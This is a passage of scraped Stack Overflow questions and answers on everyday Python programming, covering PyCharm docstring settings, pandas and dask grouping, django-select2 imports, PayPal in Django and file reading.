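print(buffered)     # 8.0
print(accumulated)  # 7.0
```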
| 1 | 2016-09-27T18:55:55Z | [
"python",
"numpy",
"matrix",
"indexing",
"vectorization"
]
|
How to change PyCharms doctring autocomplete | 39,730,701 | <p>I have been programming in PyCharm for a little while now and I like it just fine however there is one little thing that is nagging at me, when I go to generate a new docstring for a function that I have defined PyCharm will autocomplete the docstring using what I believe is sphinx style formatting. Example in picture below:</p>
<p><a href="http://i.stack.imgur.com/Cz66Q.png" rel="nofollow"><img src="http://i.stack.imgur.com/Cz66Q.png" alt="PyCharm default docstring autocomplete"></a></p>
<p>I'd like to change this format to something appear like the docstrings throughout the numpy module. Here is the beginning of the docstring for numpy.max for an example;</p>
<p><a href="http://i.stack.imgur.com/8S0ma.png" rel="nofollow"><img src="http://i.stack.imgur.com/8S0ma.png" alt="Docstring for numpy.max"></a></p>
<p>Is there a way I can either A) quickly swap the PyCharm docstring autocomplete method or B) cumstomize the existing autocomplete method? </p>
| 0 | 2016-09-27T17:16:42Z | 39,730,865 | <p>You can adjust this by going to the <a href="https://www.jetbrains.com/help/pycharm/2016.1/python-integrated-tools.html" rel="nofollow">Python Integrated Tools</a> settings.</p>
<h3>On Windows/Linux</h3>
<pre><code>File -> Settings -> Tools -> Python Integrated Tools
</code></pre>
<h3>On OS X</h3>
<pre><code>PyCharm -> Preferences -> Tools -> Python Integrated Tools
</code></pre>
<p>Then there is a <code>Docstrings</code> section. Change the drop down format to <code>NumPy</code> and press "OK"</p>
<p><a href="http://i.stack.imgur.com/qH5AC.png" rel="nofollow"><img src="http://i.stack.imgur.com/qH5AC.png" alt="Docstring format"></a></p>
| 3 | 2016-09-27T17:26:51Z | [
"python",
"python-3.x",
"pycharm",
"jetbrains"
]
|
Panda group dataframe based on datetime type into different period ignoring date part | 39,730,737 | <p>I want to group the rows into groups, based on variable time interval.
However, when grouping, I want to ignore the date part and group only based on the time of day. </p>
<p>Say I want to group every 5 minutes.</p>
<pre><code> timestampe val
0 2016-08-11 11:03:00 0.1
1 2016-08-13 11:06:00 0.3
2 2016-08-09 11:04:00 0.5
3 2016-08-05 11:35:00 0.7
4 2016-08-19 11:09:00 0.8
5 2016-08-21 12:37:00 0.9
into
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
timestampe val
3 2016-08-05 11:35:00 0.7
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
<p>Notice as long as the time is within the same 5 minutes interval, the rows are grouped, regardless of the date.</p>
| 2 | 2016-09-27T17:18:55Z | 39,731,398 | <p>This is assuming you split the day up into 5 minute windows</p>
<pre><code>df.groupby(df.timestampe.dt.hour.mul(60) \
.add(df.timestampe.dt.minute) // 5) \
.apply(pd.DataFrame.reset_index)
</code></pre>
<p><a href="http://i.stack.imgur.com/7Y76B.png" rel="nofollow"><img src="http://i.stack.imgur.com/7Y76B.png" alt="enter image description here"></a></p>
<hr>
<pre><code>for name, group in df.groupby(df.timestampe.dt.hour.mul(60).add(df.timestampe.dt.minute) // 5):
print name
print group
print
132
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
133
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
139
timestampe val
3 2016-08-05 11:35:00 0.7
151
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
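<p>The grouping key used above can be reproduced with plain datetime arithmetic, which makes it clear why the date never enters the key (a minimal sketch):</p>

```python
from datetime import datetime

def bucket(ts):
    # Minutes since midnight, floor-divided by the window size (5 min).
    return (ts.hour * 60 + ts.minute) // 5

print(bucket(datetime(2016, 8, 11, 11, 3)))   # 132
print(bucket(datetime(2016, 8, 9, 11, 4)))    # 132, same group despite another date
print(bucket(datetime(2016, 8, 5, 11, 35)))   # 139
print(bucket(datetime(2016, 8, 21, 12, 37)))  # 151
```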
| 3 | 2016-09-27T17:59:58Z | [
"python",
"datetime",
"pandas",
"numpy",
"scipy"
]
|
Panda group dataframe based on datetime type into different period ignoring date part | 39,730,737 | <p>I want to group the rows into groups, based on variable time interval.
However, when grouping, I want to ignore the date part and group only based on the time of day. </p>
<p>Say I want to group every 5 minutes.</p>
<pre><code> timestampe val
0 2016-08-11 11:03:00 0.1
1 2016-08-13 11:06:00 0.3
2 2016-08-09 11:04:00 0.5
3 2016-08-05 11:35:00 0.7
4 2016-08-19 11:09:00 0.8
5 2016-08-21 12:37:00 0.9
into
timestampe val
0 2016-08-11 11:03:00 0.1
2 2016-08-09 11:04:00 0.5
timestampe val
1 2016-08-13 11:06:00 0.3
4 2016-08-19 11:09:00 0.8
timestampe val
3 2016-08-05 11:35:00 0.7
timestampe val
5 2016-08-21 12:37:00 0.9
</code></pre>
<p>Notice as long as the time is within the same 5 minutes interval, the rows are grouped, regardless of the date.</p>
| 2 | 2016-09-27T17:18:55Z | 39,731,526 | <p>Since you do not care about the <code>date</code> part of your <code>datetime</code> object, I think that making all <code>date</code> values equal is a good trick.</p>
<pre><code>df['time'] = df['timestamp'].apply(lambda x: x.replace(year=2000, month=1, day=1))
</code></pre>
<p>You get:</p>
<pre><code> timestamp val time
0 2016-08-11 11:03:00 0.1 2000-01-01 11:03:00
1 2016-08-13 11:06:00 0.3 2000-01-01 11:06:00
2 2016-08-09 11:04:00 0.5 2000-01-01 11:04:00
3 2016-08-05 11:35:00 0.7 2000-01-01 11:35:00
4 2016-08-19 11:09:00 0.8 2000-01-01 11:09:00
5 2016-08-21 11:37:00 0.9 2000-01-01 11:37:00
</code></pre>
<p>Now you can do what you what on <code>time</code> column. For example, groups on every 5 mins:</p>
<pre><code>grouped = df.groupby(Grouper(key='time', freq='5min'))
grouped.count()
timestamp val
time
2000-01-01 11:00:00 2 2
2000-01-01 11:05:00 2 2
2000-01-01 11:10:00 0 0
2000-01-01 11:15:00 0 0
2000-01-01 11:20:00 0 0
2000-01-01 11:25:00 0 0
2000-01-01 11:30:00 0 0
2000-01-01 11:35:00 2 2
</code></pre>
<p>Hope this trick may be suitable for your need. Thanks!</p>
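<p>The replace trick itself is plain datetime behaviour and can be checked without pandas:</p>

```python
from datetime import datetime

def strip_date(ts):
    # Pin every timestamp to the same dummy date; only the time part varies.
    return ts.replace(year=2000, month=1, day=1)

a = strip_date(datetime(2016, 8, 11, 11, 3))
b = strip_date(datetime(2016, 8, 9, 11, 3))

print(a)       # 2000-01-01 11:03:00
print(a == b)  # True: different dates, same time of day
```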
| 0 | 2016-09-27T18:07:19Z | [
"python",
"datetime",
"pandas",
"numpy",
"scipy"
]
|
ModelSelect2MultipleField not defined | 39,730,764 | <p>Does anybody know where ModelSelect2MultipleField is imported from?
I've been trying to import it into a file that I need, and I thought that I could do it with</p>
<pre><code>from django_select2.fields import ModelSelect2MultipleField
</code></pre>
<p>but I keep getting errors.
Before when I had it </p>
<pre><code>from django_select2 import *
</code></pre>
<p>It said that ModelSelect2MultipleField, which I use in the py file, was not defined. Now it says that there is no module named fields.</p>
<p>The .py file I'm talking about can be found here (<a href="https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default" rel="nofollow">https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default</a>).</p>
<p>The Django-Select2 I have installed is version 5.8.9, so is there another way to import ModelSelect2MultipleField other than this way?</p>
<p>Thanks in advance!</p>
| 0 | 2016-09-27T17:21:07Z | 39,730,849 | <p>You need to use <code>from django_select2.forms import ModelSelect2MultipleWidget</code>. I found this by looking at the test application <a href="https://github.com/applegrew/django-select2/blob/master/tests/testapp/forms.py" rel="nofollow">here</a>.</p>
<p>There is no ModelSelect2MultipleField there is however a ModelSelect2MultipleWidget which should do what you need.</p>
| 0 | 2016-09-27T17:25:52Z | [
"python",
"django"
]
|
ModelSelect2MultipleField not defined | 39,730,764 | <p>Does anybody know where ModelSelect2MultipleField is imported from?
I've been trying to import it into a file that I need, and I thought that I could do it with</p>
<pre><code>from django_select2.fields import ModelSelect2MultipleField
</code></pre>
<p>but I keep getting errors.
Before when I had it </p>
<pre><code>from django_select2 import *
</code></pre>
<p>It said that ModelSelect2MultipleField, which I use in the py file, was not defined. Now it says that there is no module named fields.</p>
<p>The .py file I'm talking about can be found here (<a href="https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default" rel="nofollow">https://bitbucket.org/cbplusd/wibo/src/efc144e1bdc1eb52f76591c60ff0a1d40464b0ed/reports/forms.py?at=master&fileviewer=file-view-default</a>).</p>
<p>The Django-Select2 I have installed is version 5.8.9, so is there another way to import ModelSelect2MultipleField other than this way?</p>
<p>Thanks in advance!</p>
| 0 | 2016-09-27T17:21:07Z | 39,731,927 | <p>You must initialise the form field as a Django widget and then specify the add-on widget in the parameters like so:</p>
<pre><code>clients = ModelMultipleChoiceField(required=False, queryset=Contact.objects, widget=Select2MultipleWidget())
</code></pre>
| 0 | 2016-09-27T18:31:26Z | [
"python",
"django"
]
|
Paypal Transactions: How to receive and send funds with PayPal API and Django? | 39,730,787 | <p>I've been wondering how to make a payment system for my Django website; with PayPal it seems to be easier for users, and I've heard there is a special API for Python, so it can be used with Django.</p>
<hr>
<p>So for example, There is user account and my account, i make a receiver function, which listens to the payment gateway and whenever user sends funds to the email, it does a specific commands. Now i also make a sender function, so i can send funds to users, Now if API get's users email whenever they see HTTP Response of Paypal paying window, i want to make a function to send it to specific email.</p>
<p>Also another example with code:</p>
<pre><code>import random
from process import multiprocessing
Users = [ "..." ]
# PayPal:
import SomePayPalApi
def Receiver():
SomePayPalApi.receive_to = SomePayPalApi.current_user.email
while True:
if SomePayPalApi.recieved:
print SomePaypalApi.recieved.amount
print SomePaypalApi.received.email
print SomePaypalApi.Balance
received = True
break
def Sender():
SomePayPalApi.sendto = random.choice(Users)
SomePayPalApi.send()
if __name__ == "__main__":
p1 = Process(target=Receiver)
p2 = Process(target=Sender)
p1.start()
p2.start()
</code></pre>
<p>I know it's not as easy as the example, but I am looking for two general functions of PayPal, paying and receiving. How can I achieve this with the API in Django? Also, if possible, how can I see the amount of money received in my account and my account balance? Can I use the PayPal API documentation with Django?
How can paying back be done with the django-paypal library?</p>
| 2 | 2016-09-27T17:22:39Z | 39,731,776 | <p>Have you considered using django-paypal as one of your installed apps?</p>
<p>It looks fit for purpose and may provide what you require. </p>
<p>Take a look:</p>
<p><a href="https://github.com/spookylukey/django-paypal" rel="nofollow">https://github.com/spookylukey/django-paypal</a>
<a href="https://django-paypal.readthedocs.io/en/stable/overview.html" rel="nofollow">https://django-paypal.readthedocs.io/en/stable/overview.html</a></p>
| 1 | 2016-09-27T18:23:07Z | [
"python",
"django",
"paypal",
"django-paypal"
]
|
Paypal Transactions: How to receive and send funds with PayPal API and Django? | 39,730,787 | <p>I've been wondering how to make a payment system for my Django website; with PayPal it seems to be easier for users, and I've heard there is a special API for Python, so it can be used with Django.</p>
<hr>
<p>So for example, There is user account and my account, i make a receiver function, which listens to the payment gateway and whenever user sends funds to the email, it does a specific commands. Now i also make a sender function, so i can send funds to users, Now if API get's users email whenever they see HTTP Response of Paypal paying window, i want to make a function to send it to specific email.</p>
<p>Also another example with code:</p>
<pre><code>import random
from process import multiprocessing
Users = [ "..." ]
# PayPal:
import SomePayPalApi
def Receiver():
SomePayPalApi.receive_to = SomePayPalApi.current_user.email
while True:
if SomePayPalApi.recieved:
print SomePaypalApi.recieved.amount
print SomePaypalApi.received.email
print SomePaypalApi.Balance
received = True
break
def Sender():
SomePayPalApi.sendto = random.choice(Users)
SomePayPalApi.send()
if __name__ == "__main__":
p1 = Process(target=Receiver)
p2 = Process(target=Sender)
p1.start()
p2.start()
</code></pre>
<p>I know it's not as easy as the example, but I am looking for two general functions of PayPal, paying and receiving. How can I achieve this with the API in Django? Also, if possible, how can I see the amount of money received in my account and my account balance? Can I use the PayPal API documentation with Django?
How can paying back be done with the django-paypal library?</p>
| 2 | 2016-09-27T17:22:39Z | 39,731,854 | <p>I am not sure about email, but if you want to access paypal ammounts, this might help.
<a href="http://stackoverflow.com/questions/34379905/get-amount-from-django-paypal?rq=1">Get amount from django-paypal</a></p>
| 1 | 2016-09-27T18:27:15Z | [
"python",
"django",
"paypal",
"django-paypal"
]
|
Pandas return column value if other column value is equal | 39,730,906 | <p>So recently I'm trying to get data from a CSV file using Python and pandas.
The code should return or print data from column 1 if data from column 2 is equal to some string. </p>
<pre><code> import pandas as pd
df = pd.read_csv('alerts.csv', sep=';', encoding='latin1')
print(df[['color']['item']].loc[['color']=='red'])
</code></pre>
<p>but it seems not to work with strings?</p>
| 0 | 2016-09-27T17:28:50Z | 39,730,997 | <p>you are not using .loc correctly</p>
<p>.loc needs an indexer and column labels, such as</p>
<pre><code>indexer = df[df['color']=='red'].index
print(df.loc[indexer,'item'])
</code></pre>
| 0 | 2016-09-27T17:33:35Z | [
"python",
"csv",
"pandas"
]
|
Trying to return number of items in a list as a column in a dataframe | 39,730,951 | <p>I have a pandas dataframe, 'df', like the following:</p>
<pre><code> name things_in_bag
0 Don [orange, pear, apple]
1 Tommy [banana, pear, apple, watermelon]
2 Larry [cucumber]
.
.
1084 Jen [pear, baseball]
</code></pre>
<p>I want to add a column called 'number_things' that totals the things in the bag.</p>
<p>I know I can use len() to get the count of the items in those arrays, however, the problem is accessing the index. So the number of items in the first row is len(df.loc[0, 'things_in_bag']).</p>
<p>But how do I populate all 1084 rows of the new column?</p>
| 1 | 2016-09-27T17:31:01Z | 39,731,042 | <p>You can use apply and take the len of each list, such as</p>
<pre><code>df['things_in_bag'].apply(len)
</code></pre>
<p>If you want to populate a new column with that data, you can then do</p>
<pre><code>df['newcol'] = df['things_in_bag'].apply(len)
</code></pre>
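<p>apply(len) simply calls len on each cell, so the plain-Python equivalent is a list comprehension (toy data mirroring the question):</p>

```python
things_in_bag = [
    ["orange", "pear", "apple"],
    ["banana", "pear", "apple", "watermelon"],
    ["cucumber"],
]

# One length per row -- the same values apply(len) would produce.
number_things = [len(bag) for bag in things_in_bag]
print(number_things)  # [3, 4, 1]
```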
| 1 | 2016-09-27T17:37:02Z | [
"python",
"pandas",
"dataframe"
]
|
Grouping values in an array | 39,730,970 | <p>I have a numpy array of size a*2. (Typical size of a is 100). In the first column are values between x_smallest and x_largest. In the second column are the corresponding y values. Now almost all x values are unique, so I want to group them. Like the first group goes from values x_smallest to x_1. The second group from x_1 to x_2. (x_smallest < x_1 < ... x_largest). This should be adjustable, so that I can find a useful size. I should mention that the x values are Not integers, but the y values are integers. (The y values are between 1 and N) Now I would like to know for each group the proportion of "n>1" y values against the "1" y values. Here is a small fraction of an example array:</p>
<pre><code>2.750000000000000000e+00,2.000000000000000000e+00
3.100000000000000089e+00,5.000000000000000000e+00
2.649999999999999911e+00,2.000000000000000000e+00
2.500000000000000000e+00,2.000000000000000000e+00
3.100000000000000089e+00,2.000000000000000000e+00
2.799999999999999822e+00,5.000000000000000000e+00
3.450000000000000178e+00,4.000000000000000000e+00
3.200000000000000178e+00,5.000000000000000000e+00
3.200000000000000178e+00,3.000000000000000000e+00
2.399999999999999911e+00,1.000000000000000000e+00
</code></pre>
<p>The output array could look like this:</p>
<pre><code>1.5, 0
2.5, 0.2
3.5, 0.5
</code></pre>
<p>(Here the x_values are the midpoint of the area of x_i and x_i+1. )The output example here clearly doesn't fit to the example array. Do you have any ideas how this can be done easily. I could only think about making many specific if else commands which wouldn't be very helpful for general cases.</p>
| 0 | 2016-09-27T17:32:05Z | 39,732,864 | <p>Okay, I think I solved it by myself. Here is the solution in case someone has a similar problem and finds this question:</p>
<pre><code>numgroup = 5  # Number of groups
dmimax = numpy.amax(dmivsstasta[:, 0])  # Gets x_largest
dmimin = numpy.amin(dmivsstasta[:, 0])  # Gets x_smallest
stamax = numpy.amax(dmivsstasta[:, 1])  # Gets y_largest
stepsize = (dmimax - dmimin) / 5.0  # Determines the size of a group
grouparray = numpy.zeros((5, stamax + 1))  # Creates array in which everything is saved
for x in range(numgroup):
    # Saves the midpoint of each group in the first column
    grouparray[x, 0] = dmimin + stepsize / 2.0 + x * stepsize
print(grouparray)  # Just to check values
print(dmimin)
print(dmimax)
print(stepsize)
for x1 in range(numgroup):  # Iterates over all values
    for x2 in range(rd):
        if (grouparray[x1, 0] - stepsize / 2.0) <= dmivsstasta[x2, 0] < (grouparray[x1, 0] + stepsize / 2.0):
            grouparray[x1, dmivsstasta[x2, 1]] += 1
print(grouparray)
</code></pre>
<p>The only missing part is to calculate the proportion, which is now easy to do with the grouparray </p>
| 0 | 2016-09-27T19:30:52Z | [
"python",
"arrays",
"numpy"
]
|
What is the frontend language/platform of api.ai and wit.ai? | 39,731,005 | <p>I am trying to develop a web application like wit.ai or api.ai. I am not sure what would be the best frontend language/platform/technology for such a web application.
In api.ai and wit.ai you create chat robots. For each robot the user defines a bunch of keywords as an entity. For example:</p>
<p><code>Entity: Pizza -> {Italian, French, Greek}</code></p>
<p>Then the user define templates for the input sentences and assign the keywords of the input sentence to the corresponding entities. For example:</p>
<pre><code>I would like to order a Italian with two topping.
</code></pre>
<p>In the sentence above, the user assign the "Italian" keyword to the "Pizza" entity. Then they just assign a output response for such a input.
The frontend should let the user performs these tasks such as highlighting a keyword, assigning to entities, showing lists of entities to the user.
Since the algorithms that I am developing are in Python, I was thinking about using Django. Do you think it is the best platform for the such a task?</p>
<p>I really appreciate your help.</p>
<p>Amir</p>
| 0 | 2016-09-27T17:34:14Z | 39,793,723 | <p>While questions about technology are typically subjective and have no 'right' answer, a 'frontend' esque language will do you a lot of good here.</p>
<p>Something like JS, nodejs etc.. You need to be able to highlight the words on the client side and not make any request to the server yet until the user specifies what the highlighted text is. Ofcourse the service that powers your API (to persist the selected entity information) can be powered by py or any language that makes you smile :)</p>
<p>All the best</p>
| 0 | 2016-09-30T14:20:32Z | [
"python",
"django",
"frontend",
"chatbot"
]
|
Python If Variable in Variable | 39,731,026 | <p>I have made a file called <code>helloworld.simon</code>.
In there I have written:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
</code></pre>
<p>And I have written this code:</p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
if Public in code:
print("Pub")
else:
print("J")
</code></pre>
<p>And the <em>output</em> is:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
J
</code></pre>
| -1 | 2016-09-27T17:35:44Z | 39,731,141 | <p>Change this line:</p>
<p><code>code = open('helloworld.simon' , 'r')</code></p>
<p>To this:</p>
<pre><code>with open('helloworld.simon' , 'r') as f:
lines = f.readlines()
    if any(Public in line for line in lines):
print("Pub")
else:
print("J")
</code></pre>
| 0 | 2016-09-27T17:43:41Z | [
"python",
"file",
"filereader"
]
|
Python If Variable in Variable | 39,731,026 | <p>I have made a file called <code>helloworld.simon</code>.
In there I have written:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
</code></pre>
<p>And I have written this code:</p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
if Public in code:
print("Pub")
else:
print("J")
</code></pre>
<p>And the <em>output</em> is:</p>
<pre><code>Public class helloworld {
main = (main.method());
main {
console.print("Hello World");
}
J
</code></pre>
| -1 | 2016-09-27T17:35:44Z | 39,731,267 | <p>File reading is sequential. Once you read a file (with <code>print(code.read())</code>), you can't read it back again unless you restart reading with <code>code.seek(0)</code>:</p>
<pre><code>Public = ("Public")
Private = ("Private")
code = open('helloworld.simon' , 'r')
print(code.read())
code.seek(0)
if Public in code.read():
print("Pub")
else:
print("J")
code.close()
</code></pre>
<p>outputs:</p>
<pre><code>Pub
</code></pre>
<p>If you comment <code>code.seek(0)</code>, outputs J</p>
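<p>The same exhaustion behaviour can be reproduced with an in-memory stream, which makes the effect of seek(0) easy to verify:</p>

```python
import io

f = io.StringIO("Public class helloworld {\n")
first = f.read()
second = f.read()   # stream already exhausted: empty string
f.seek(0)           # rewind to the start
third = f.read()    # full contents again

print("Public" in first)   # True
print(second == "")        # True
print("Public" in third)   # True
```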
| 1 | 2016-09-27T17:51:56Z | [
"python",
"file",
"filereader"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,731,085 | <p>Simple solution, add the keys you want to remove to a list and then remove them after looping through all elements:</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
to_be_removed = list()
</code></pre>
<p>...</p>
<pre><code>for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
to_be_removed.append(key1)
to_be_removed.append(key2)
for remove_me in to_be_removed:
self.actives.pop(remove_me, None)
</code></pre>
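<p>A minimal, self-contained version of the defer-then-remove pattern (toy positions instead of kinematic objects), using a set so that a key collected more than once is only popped once:</p>

```python
actives = {'missile': (0, 1, 2), 'target': (0, 1, 2), 'clutter': (9, 9, 9)}

to_be_removed = set()
for k1 in actives:
    for k2 in actives:
        if k1 != k2 and actives[k1] == actives[k2]:
            # Collect now, remove later: mutating the dict inside
            # these loops is what caused the KeyError.
            to_be_removed |= {k1, k2}

for key in to_be_removed:
    actives.pop(key, None)   # pop(..., None) tolerates missing keys

print(sorted(actives))  # ['clutter']
```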
| 1 | 2016-09-27T17:40:12Z | [
"python",
"dictionary"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,731,126 | <p>As you're looping, you can double-check that the key is still present:</p>
<pre><code>for key1 in self.actives.keys():
if key1 not in self.actives:
continue
for key2 in self.actives.keys():
if key2 not in self.actives:
continue
# okay, both keys are still here. go do stuff
if not key1 == key2:
</code></pre>
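<p>A toy run of the guard pattern, deleting as soon as a collision is found (here two entries "collide" when their values are equal; list(actives) snapshots the keys, much as Python 2's .keys() did):</p>

```python
actives = {'a': 1, 'b': 1, 'c': 2}

for key1 in list(actives):       # snapshot of the keys
    if key1 not in actives:      # may already be gone from an earlier pass
        continue
    for key2 in list(actives):
        if key2 not in actives or key1 == key2:
            continue
        if actives[key1] == actives[key2]:
            del actives[key1]
            del actives[key2]
            break                # key1 is gone; move on

print(actives)  # {'c': 2}
```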
| 1 | 2016-09-27T17:42:19Z | [
"python",
"dictionary"
]
|
Application of Removing Items from Dictionaries | 39,731,032 | <p>Suppose I have a dictionary that contains instances of kinematic objects. Each kinematic object has a position, velocity, etc. On each timestep update for the program, I want to check to see if two active objects (not the same object, mind you) occupy the same position in the reference frame. If they do, this would simulate a collision, the two objects involved would be destroyed, and their instances would be removed from the active objects dictionary.</p>
<pre><code>dict actives{ 'missile' : object_c(x1, y1, z1),
'target' : object_c(x2, y2, z2),
'clutter' : object_c(x3, y3, z3),
... }
...
for key1 in self.actives.keys():
for key2 in self.actives.keys():
if not key1 == key2:
# Get Inertial Positions and Distance
Pos21 = self.actives[key2].Pos - self.actives[key1].Pos
distance = math.sqrt(sum(Pos21**2))
# If Distance <= Critical Distance
if distance <= 1.0e0
# Remove key1 and key2 from Actives
# -- This is where I need help --
</code></pre>
<p>I can't use <code>del</code>: the keys (and objects) would be removed from actives, but the <code>for</code> loops' conditions fail to recognize this and will encounter a KeyError. What can I do to remove these objects from actives while accessing the keys for the loop conditions?</p>
| 0 | 2016-09-27T17:36:23Z | 39,732,307 | <p>I think Maximilian Peters had the right basic idea, but the items to be removed should be kept in a <code>set</code> rather than a <code>list</code> to avoid issues with an active key being in it multiple times. To further hasten the collision detection process, I changed the comparison loop to use the <a href="https://docs.python.org/2/library/itertools.html#itertools.combinations" rel="nofollow"><code>itertools.combinations()</code></a> generator function so as to only test unique pairs of objects.</p>
<p>I also had to add a fair amount of scaffolding to make it possible test the code in a context like you probably have it running in...</p>
<pre><code>from itertools import combinations
import math
CRITICAL_DIST = 2.0e0
class ObjectC(object):
def __init__(self, x, y, z):
self.posn = x, y, z
def __repr__(self):
return '{}({}, {}, {})'.format(self.__class__.__name__, *self.posn)
class Game(object):
def remove_collisons(self):
to_remove = set()
for key1, key2 in combinations(self.actives, 2):
# Calculate distance.
deltas = (
(self.actives[key2].posn[0] - self.actives[key1].posn[0])**2,
(self.actives[key2].posn[1] - self.actives[key1].posn[1])**2,
(self.actives[key2].posn[2] - self.actives[key1].posn[2])**2)
distance = math.sqrt(sum(deltas))
# Check for collision.
if distance <= CRITICAL_DIST:
to_remove |= {key1, key2} # both objects should be removed
if to_remove:
print('removing: {!r}'.format(list(to_remove)))
self.actives = {
k: v for k, v in self.actives.items() if k not in to_remove}
x1, y1, z1 = 0, 1, 2
x2, y2, z2 = 1, 2, 3
x3, y3, z3 = 2, 3, 1
actives = {'missile' : ObjectC(x1, y1, z1),
'target' : ObjectC(x2, y2, z2),
'clutter' : ObjectC(x3, y3, z3),
} # ...
game = Game()
game.actives = actives
print('before: {}'.format(game.actives))
game.remove_collisons()
print('after: {}'.format(game.actives))
</code></pre>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code> before: {'clutter': ObjectC(2, 3, 1), 'target': ObjectC(1, 2, 3), 'missile': ObjectC(0, 1, 2)}
removing: ['target', 'missile']
after: {'clutter': ObjectC(2, 3, 1)}
</code></pre>
| 1 | 2016-09-27T18:54:21Z | [
"python",
"dictionary"
]
|
iterate over GroupBy object in dask | 39,731,098 | <p>Is it possible, to iterate over a dask GroupBy object to get access to the underlying dataframes? I tried:</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1,2,3,4,5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for name, df in groups:
print(name)
</code></pre>
<p>However, this results in an error: <code>KeyError: 'Column not found: 0'</code></p>
<p>More generally speaking, what kind of interactions does the dask GroupBy object allow, except from the apply method?</p>
| 1 | 2016-09-27T17:40:48Z | 39,732,788 | <p>you could iterate through groups doing this with dask, maybe there is a better way but this works for me.</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1, 2, 3, 4, 5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for group in pdf['B'].unique():
    print(groups.get_group(group))
</code></pre>
<p>this would return</p>
<pre><code>dd.DataFrame<dataframe-groupby-get_group-e3ebb5d5a6a8001da9bb7653fface4c1, divisions=(0, 2, 4, 4)>
dd.DataFrame<dataframe-groupby-get_group-022502413b236592cf7d54b2dccf10a9, divisions=(0, 2, 4, 4)>
</code></pre>
| 1 | 2016-09-27T19:26:31Z | [
"python",
"pandas",
"dask"
]
|
iterate over GroupBy object in dask | 39,731,098 | <p>Is it possible, to iterate over a dask GroupBy object to get access to the underlying dataframes? I tried:</p>
<pre><code>import dask.dataframe as dd
import pandas as pd
pdf = pd.DataFrame({'A':[1,2,3,4,5], 'B':['1','1','a','a','a']})
ddf = dd.from_pandas(pdf, npartitions = 3)
groups = ddf.groupby('B')
for name, df in groups:
print(name)
</code></pre>
<p>However, this results in an error: <code>KeyError: 'Column not found: 0'</code></p>
<p>More generally speaking, what kind of interactions does the dask GroupBy object allow, except from the apply method?</p>
| 1 | 2016-09-27T17:40:48Z | 39,831,940 | <p>Generally iterating over Dask.dataframe objects is not recommended. It is inefficient. Instead you might want to try constructing a function and mapping that function over the resulting groups using <code>groupby.apply</code></p>
